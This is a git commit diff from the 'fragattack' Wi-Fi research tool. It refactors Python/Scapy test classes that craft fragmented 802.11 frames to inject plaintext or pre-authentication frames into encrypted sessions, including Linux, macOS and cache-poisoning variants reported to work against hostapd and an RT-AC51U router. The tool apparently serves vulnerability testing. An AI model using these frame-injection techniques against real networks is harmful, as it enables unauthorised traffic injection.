fragattack: easier definition of tests

This commit is contained in:
Mathy 2020-03-30 13:13:21 -04:00
parent 79de461d16
commit 82e308f1b2
2 changed files with 183 additions and 146 deletions

View File

@ -22,7 +22,7 @@ from scapy.contrib.wpa_eapol import WPA_key
#MAC_STA2 = "20:16:b9:b2:73:7a"
MAC_STA2 = "80:5a:04:d4:54:c4"
# ---------- Utility Commands ----------
# ----------------------------------- Utility Commands -----------------------------------
def wpaspy_clear_messages(ctrl):
# Clear old replies and messages from the hostapd control interface. This is not
@ -47,7 +47,6 @@ def argv_pop_argument(argument):
del sys.argv[idx]
return True
class TestOptions():
def __init__(self):
# Workaround for ath9k_htc bugs
@ -57,6 +56,38 @@ class TestOptions():
self.clientip = None
self.routerip = None
# ----------------------------------- Tests -----------------------------------
# XXX --- We should always first see how the DUT reactions to a normal packet.
# For example, Aruba only responded to DHCP after reconnecting, and
# ignored ICMP and ARP packets.
REQ_ARP, REQ_ICMP, REQ_DHCP = range(3)
def generate_request(sta, ptype):
header = sta.get_header()
if ptype == REQ_ARP:
# XXX --- Add extra checks on the ARP packet
check = lambda p: ARP in p and p.hwsrc == sta.peermac and p.psrc == sta.peerip
request = LLC()/SNAP()/ARP(op=1, hwsrc=sta.mac, psrc=sta.ip, hwdst=sta.peermac, pdst=sta.peerip)
elif ptype == REQ_ICMP:
label = b"test_ping_icmp"
check = lambda p: ICMP in p and label in raw(p)
request = LLC()/SNAP()/IP(src=sta.ip, dst=sta.peerip)/ICMP()/Raw(label)
elif ptype == REQ_DHCP:
xid = random.randint(0, 2**31)
check = lambda p: BOOTP in p and p[BOOTP].xid == xid
rawmac = bytes.fromhex(sta.mac.replace(':', ''))
request = LLC()/SNAP()/IP(src="0.0.0.0", dst="255.255.255.255")
request = request/UDP(sport=68, dport=67)/BOOTP(op=1, chaddr=rawmac, xid=xid)
request = request/DHCP(options=[("message-type", "discover"), "end"])
# We assume DHCP discover is sent towards the AP.
header.addr3 = "ff:ff:ff:ff:ff:ff"
return header, request, check
class Frag():
# StartAuth: when starting the handshake
@ -70,7 +101,7 @@ class Frag():
# Reconnect: force a reconnect
GetIp, Rekey, Reconnect = range(3)
def __init__(self, trigger, encrypted, frame=None, flags=None, inc_pn=1):
def __init__(self, trigger, encrypted, header=None, flags=None, inc_pn=1):
self.trigger = trigger
if flags != None and not isinstance(flags, list):
@ -80,7 +111,7 @@ class Frag():
self.encrypted = encrypted
self.inc_pn = inc_pn
self.frame = frame
self.header = header
def next_flag(self):
if len(self.flags) == 0:
@ -92,16 +123,15 @@ class Frag():
return None
return self.flags.pop(0)
class Test():
# Type of request packet to use in general tests.
# XXX --- We should always first see how the DUT reactions to a normal packet.
# For example, Aruba only responded to DHCP after reconnecting, and
# ignored ICMP and ARP packets.
ARP, ICMP, DHCP = range(3)
class Test(metaclass=abc.ABCMeta):
"""
Base class to define tests. The default defined methods can be used,
but they can also be overriden if desired.
"""
def __init__(self, fragments=None):
self.fragments = fragments if fragments != None else []
self.check = None
self.generated = False
def next_trigger_is(self, trigger):
if len(self.fragments) == 0:
@ -109,11 +139,6 @@ class Test():
return self.fragments[0].next_flag() == None and \
self.fragments[0].trigger == trigger
def next(self):
frag = self.fragments[0]
del self.fragments[0]
return frag
def next_flag(self):
if len(self.fragments) == 0:
return None
@ -124,6 +149,124 @@ class Test():
return None
return self.fragments[0].pop_flag()
def next(self, station):
if not self.generated:
self.generate(station)
self.generated = True
frag = self.fragments[0]
del self.fragments[0]
return frag
@abc.abstractmethod
def generate(self, station):
pass
@abc.abstractmethod
def check(self, p):
pass
class PingTest(Test):
def __init__(self, ptype, fragments):
super().__init__(fragments)
self.ptype = ptype
self.check_fn = None
def check(self, p):
if self.check_fn == None:
return False
return self.check_fn(p)
def generate(self, station):
# Generate the header and payload
header, request, self.check_fn = generate_request(station, self.ptype)
# Generate all the individual (fragmented) frames
frames = create_fragments(header, request, len(self.fragments))
# Assign frames to the existing fragment objects
for frag, frame in zip(self.fragments, frames):
frag.frame = frame
class LinuxTest(Test):
def __init__(self, ptype):
super().__init__([
Frag(Frag.Connected, True),
Frag(Frag.Connected, True),
Frag(Frag.Connected, False)
])
self.ptype = ptype
def generate(self, station):
header, request, self.check_fn = generate_request(station, self.ptype)
frag1, frag2 = create_fragments(header, request, 2)
# Fragment 1: normal
self.fragments[0].frame = frag1
# Fragment 2: make Linux update latest used crypto Packet Number
frag2enc = frag2.copy()
frag2enc.SC ^= (1 << 4) | 1
self.fragments[1].frame = frag2enc
# Fragment 3: can now inject last fragment as plaintext
self.fragments[2].frame = frag2
return test
class MacOsTest(Test):
"""
See docs/macoxs-reversing.md for background on the attack.
"""
def __init__(self, ptype):
super().__init__([
Frag(Frag.BeforeAuth, False),
Frag(Frag.BeforeAuth, False)
])
self.ptype = ptype
def generate(self, station):
# First fragment is the start of an EAPOL frame
header = station.get_header(prior=2)
request = LLC()/SNAP()/EAPOL()/EAP()/Raw(b"A"*32)
frag1, _ = create_fragments(header, data=request, num_frags=2)
# Second fragment has same sequence number. Will be accepted
# before authenticated because previous fragment was EAPOL.
# By sending to broadcast, this fragment will not be reassembled
# though, meaning it will be treated as a full frame (and not EAPOL).
_, request, self.check_fn = generate_request(station, self.ptype)
frag2 = create_fragments(header, data=request, num_frags=1)
frag2.addr1 = "ff:ff:ff:ff:ff:ff"
self.fragments[0].frame = frag1
self.fragments[1].frame = frag2
class EapolTest(Test):
# TODO:
# Test 1: plain unicast EAPOL fragment, plaintext broadcast frame => trivial frame injection
# Test 2: plain unicast EAPOL fragment, encrypted broadcast frame => just an extra test
# Test 3: plain unicast EAPOL fragment, encrypted unicast fragment => demonstrates mixing of plain/encrypted fragments
# Test 4: EAPOL and A-MSDU tests?
def __init__(self):
super().__init__([
Frag(Frag.BeforeAuth, False),
Frag(Frag.BeforeAuth, False)
])
def generate(self, station):
header = station.get_header(prior=2)
request = LLC()/SNAP()/EAPOL()/EAP()/Raw(b"A"*32)
frag1, frag2 = create_fragments(header, data=request, num_frags=2)
frag1copy, frag2copy = create_fragments(header, data=request, num_frags=2)
frag1copy.addr1 = "ff:ff:ff:ff:ff:ff"
frag2copy.addr1 = "ff:ff:ff:ff:ff:ff"
self.fragments[0].frame = frag1
self.fragments[0].frame = frag2
# ----------------------------------- Abstract Station Class -----------------------------------
class Station():
def __init__(self, daemon, mac, ds_status):
@ -236,153 +379,43 @@ class Station():
self.set_header(header, prior=prior, **kwargs)
return header
def create_fragments(self, header, data, num_frags):
data = raw(data)
fragments = []
fragsize = (len(data) + 1) // num_frags
for i in range(num_frags):
frag = header.copy()
frag.SC |= i
if i < num_frags - 1:
frag.FCfield |= Dot11(FCfield="MF").FCfield
payload = data[fragsize * i : fragsize * (i + 1)]
frag = frag/Raw(payload)
fragments.append(frag)
return fragments
def encrypt(self, frame, inc_pn=1):
self.pn += inc_pn
key, keyid = (self.tk, 0) if int(frame.addr1[1], 16) & 1 == 0 else (self.gtk, self.gtk_idx)
encrypted = encrypt_ccmp(frame, key, self.pn, keyid)
return encrypted
def generate_request(self, ptype):
header = self.get_header()
if ptype == Test.ARP:
# XXX --- Add extra checks on the ARP packet
check = lambda p: ARP in p and p.hwsrc == self.peermac and p.psrc == self.peerip
request = LLC()/SNAP()/ARP(op=1, hwsrc=self.mac, psrc=self.ip, hwdst=self.peermac, pdst=self.peerip)
elif ptype == Test.ICMP:
label = b"test_ping_icmp"
check = lambda p: ICMP in p and label in raw(p)
request = LLC()/SNAP()/IP(src=self.ip, dst=self.peerip)/ICMP()/Raw(label)
elif ptype == Test.DHCP:
xid = random.randint(0, 2**31)
check = lambda p: BOOTP in p and p[BOOTP].xid == xid
rawmac = bytes.fromhex(self.mac.replace(':', ''))
request = LLC()/SNAP()/IP(src="0.0.0.0", dst="255.255.255.255")
request = request/UDP(sport=68, dport=67)/BOOTP(op=1, chaddr=rawmac, xid=xid)
request = request/DHCP(options=[("message-type", "discover"), "end"])
# We assume DHCP discover is sent towards the AP.
# XXX Is there an equivalent for against the client? Response to DHCP Discover/Request?
header.addr3 = "ff:ff:ff:ff:ff:ff"
return header, request, check
def generate_test_ping(self, ptype, frags):
test = Test(frags)
header, request, test.check = self.generate_request(ptype)
frames = self.create_fragments(header, request, len(frags))
for frag, frame in zip(frags, frames):
frag.frame = frame
return test
def generate_linux_attack_ping(self, ptype):
test = Test()
header, request, test.check = self.generate_request(ptype)
header = self.get_header()
frag1, frag2 = self.create_fragments(header, request, 2)
# Fragment 1: normal
test.fragments.append(Frag(frag1, Frag.Connected, True))
# Fragment 2: make Linux update latest used crypto Packet Number
frag2enc = frag2.copy()
frag2enc.SC ^= (1 << 4) | 1
test.fragments.append(Frag(frag2enc, Frag.Connected, True))
# Fragment 3: can now inject last fragment as plaintext
test.fragments.append(Frag(frag2, Frag.Connected, False))
return test
def generate_test_eapol(self, num_bytes=16, num_frags=1):
header = self.get_header()
request = LLC()/SNAP()/EAPOL()/EAP()/Raw(b"A"*32)
frags = self.create_fragments(header, request, num_frags)
test = Test()
for frag in frags:
test.fragments.append(Frag(frag), Frag.StartAuth, False)
return test
def generate_test_eapol_debug(self):
"""Here we manually tweak things for ad-hoc tests"""
header = self.get_header(prior=2)
request = LLC()/SNAP()/EAPOL()/EAP()/Raw(b"A"*32)
frag1, frag2 = self.create_fragments(header, data=request, num_frags=2)
frag1copy, frag2copy = self.create_fragments(header, data=request, num_frags=2)
frag1copy.addr1 = "ff:ff:ff:ff:ff:ff"
frag2copy.addr1 = "ff:ff:ff:ff:ff:ff"
# To generate the tests we need to know the MAC and IP addresses
test = Test()
#test.fragments.append(Frag(frag1, Frag.BeforeAuth, False))
#test.fragments.append(Frag(frag2copy, Frag.BeforeAuth, False))
#test.fragments.append(Frag(frag2copy, Frag.AfterAuth, False))
test.fragments.append(Frag(header/LLC()/SNAP()/IP()/ICMP(), Frag.AfterAuth, False))
#test.fragments.append(Frag(frag2, Frag.AfterAuth, True))
return test
def generate_tests(self):
self.test = self.generate_test_ping(Test.DHCP,
# Simple ping as sanity check
self.test = PingTest(REQ_ICMP,
[Frag(Frag.Connected, True, flags=Frag.GetIp)])
# Worked against Linux Hostapd and RT-AC51U
self.test = self.generate_test_ping(Test.DHCP,
# Cache poison attack. Worked against Linux Hostapd and RT-AC51U.
self.test = PingTest(REQ_ICMP,
[Frag(Frag.Connected, True),
Frag(Frag.Connected, True , flags=Frag.Reconnect)])
Frag(Frag.Connected, True, flags=Frag.Reconnect)])
#self.test = self.generate_test_ping(Test.DHCP,
# Two fragments over different PTK keys
#self.test = self.generate_test_ping(REQ_DHCP,
# [Frag(Frag.BeforeAuth, True, wait_rekey=True),
# Frag(Frag.AfterAuth, True)])
#self.text = self.generate_test_eapol()
#self.test = self.generate_test_eapol_debug()
#self.test = Test()
#self.test = self.generate_linux_attack_ping()
#self.test = self.generate_test_rekey()
# TODO:
# - Test case to check if the receiver supports interleaved priority
# reception. It seems Windows 10 / Intel might not support this.
# - Test case with a very lage aggregated frame (which is normally not
# allowed but some may accept it). And a variation to check how APs
# will forward such overly large frame (e.g. force fragmentation).
# 1. ============================================================
# 1.1 Encrypted (= sanity ping test)
# 1.2 Plaintext (= text plaintext injection)
# 1.3 Encrpted, Encrypted
# 1.4 [TKIP] Encrpted, Encrypted, no global MIC
# 1.5 Plaintext, plaintext
# 1.6 Encrypted, plaintext
# 1.7 Plaintext, encrypted
# 1.8 Encrypted, plaintext, encrypted
# 1.9 Plaintext, encrypted, plaintext
# 2. Test 2 but first plaintext sent before installing key
# - 1.1 Encrypted (= sanity ping test)
# 1.2 Plaintext (= text plaintext injection)
# 1.3 Encrpted, Encrypted
# 1.4 [TKIP] Encrpted, Encrypted, no global MIC
# 1.5 Plaintext, plaintext
# 1.6 Encrypted, plaintext
# 1.7 Plaintext, encrypted
# 1.8 Encrypted, plaintext, encrypted
# 1.9 Plaintext, encrypted, plaintext
# 2. Test 2 but first plaintext sent before installing key
log(STATUS, "Constructed test case", color="green")
@ -405,7 +438,7 @@ class Station():
frame = None
while self.test.next_trigger_is(trigger):
Frag = self.test.next()
Frag = self.test.next(self)
if Frag.encrypted:
assert self.tk != None and self.gtk != None
frame = self.encrypt(Frag.frame, inc_pn=Frag.inc_pn)
@ -519,6 +552,8 @@ class Station():
self.time_connected = None
self.handle_connected()
# ----------------------------------- Client and AP Daemons -----------------------------------
class Daemon(metaclass=abc.ABCMeta):
def __init__(self, options):
self.options = options
@ -915,12 +950,14 @@ class Supplicant(Daemon):
clientmac = scapy.arch.get_if_hwaddr(self.nic_iface)
self.station = Station(self, clientmac, "to-DS")
# ----------------------------------- Main Function -----------------------------------
def cleanup():
daemon.stop()
if __name__ == "__main__":
log(WARNING, "\nRemember to use a modified backports and ath9k_htc firmware!\n")
if "--help" in sys.argv or "-h" in sys.argv:
print("\nSee README.md for usage instructions.")
quit(1)

@ -1 +1 @@
Subproject commit ac5cb37f36a049fa80edde1716f8392275cb72af
Subproject commit cb5a4a716d65fc13ce0abc7abe3ba6c1d5aca0d8